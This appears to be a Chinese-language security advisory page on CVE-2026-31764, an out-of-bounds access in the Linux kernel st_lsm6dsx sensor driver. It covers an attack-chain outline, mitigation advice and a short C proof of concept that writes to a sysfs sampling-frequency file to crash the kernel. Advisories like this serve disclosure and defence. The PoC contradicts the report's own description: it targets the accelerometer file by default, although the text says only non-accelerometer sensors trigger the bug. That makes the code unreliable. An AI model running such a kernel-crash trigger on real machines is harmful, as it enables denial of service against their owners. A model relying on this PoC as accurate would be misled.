IPBUF安全漏洞报告
English
CVE-2026-31764 CVSS 7.8 高危

CVE-2026-31764 Linux内核st_lsm6dsx驱动越界访问漏洞

披露日期: 2026-05-01
来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号
CVE-2026-31764
漏洞类型
越界访问
CVSS评分
7.8 高危
攻击向量
本地 (AV:L)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Linux Kernel

相关标签

Linux KernelCVE-2026-31764越界访问本地提权驱动程序漏洞DoS

漏洞概述

Linux内核st_lsm6dsx驱动存在越界访问漏洞。在设置缓冲区采样频率时,`st_lsm6dsx_check_odr`函数使用`sensor->id`索引访问仅包含2个元素的`odr_table`数组。若针对非加速度计或陀螺仪的传感器进行操作,将导致数组越界,可能引发内核崩溃或权限提升。

技术细节

漏洞位于Linux内核`iio: imu: st_lsm6dsx`驱动中。当用户空间程序通过sysfs接口写入缓冲区采样频率属性时,会触发`st_lsm6dsx_hwfifo_odr_store`函数。该函数调用`st_lsm6dsx_check_odr`来检查输出数据率(ODR),并使用`sensor->id`作为索引访问`odr_table`数组。然而,该数组仅预定义了加速度计和陀螺仪的配置,长度仅为2。当`sensor->id`指向步数计数器或Sign Motion等其他传感器类型时,代码会执行越界内存访问。攻击者利用此漏洞可导致内核崩溃(拒绝服务)或潜在的权限提升。

攻击链分析

STEP 1
步骤1:本地访问
攻击者获得目标系统的本地低权限用户访问权限。
STEP 2
步骤2:识别设备
识别系统中是否加载了易受攻击的st_lsm6dsx驱动及对应的IIO设备节点。
STEP 3
步骤3:触发漏洞
利用sysfs接口,针对非加速度计类型的传感器(如步数计数器)写入缓冲区采样频率。
STEP 4
步骤4:越界访问
内核处理写入请求时,`odr_table`数组发生越界访问,导致内核崩溃或潜在的代码执行。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
/* * PoC for CVE-2026-31764 * Triggering out-of-bounds access in st_lsm6dsx driver * by writing to the sampling frequency attribute. */ #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <unistd.h> #include <string.h> int main(int argc, char **argv) { int fd; const char *path = "/sys/bus/iio/devices/iio:device0/in_accel_sampling_frequency"; // Target a frequency value to trigger the check const char *val = "100"; if (argc > 1) { path = argv[1]; } printf("[+] Attempting to write to %s\n", path); fd = open(path, O_WRONLY); if (fd < 0) { perror("[-] Failed to open device file"); return 1; } if (write(fd, val, strlen(val)) < 0) { perror("[-] Failed to write to device"); } else { printf("[+] Write successful. If kernel panics or logs OOB, vulnerability confirmed.\n"); } close(fd); return 0; }

影响范围

Linux Kernel < Git commit 3225a81e8d264442b14c7c1bc965ebafa3c0ee01
Linux Kernel < Git commit 679c04c10d65d32a3f269e696b22912ff0a001b9

防御指南

临时缓解措施
建议立即升级内核。若无法立即升级,可通过修改udev规则或挂载参数限制非特权用户对`/sys/bus/iio/`目录下文件的写入权限,从而阻断漏洞触发路径。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表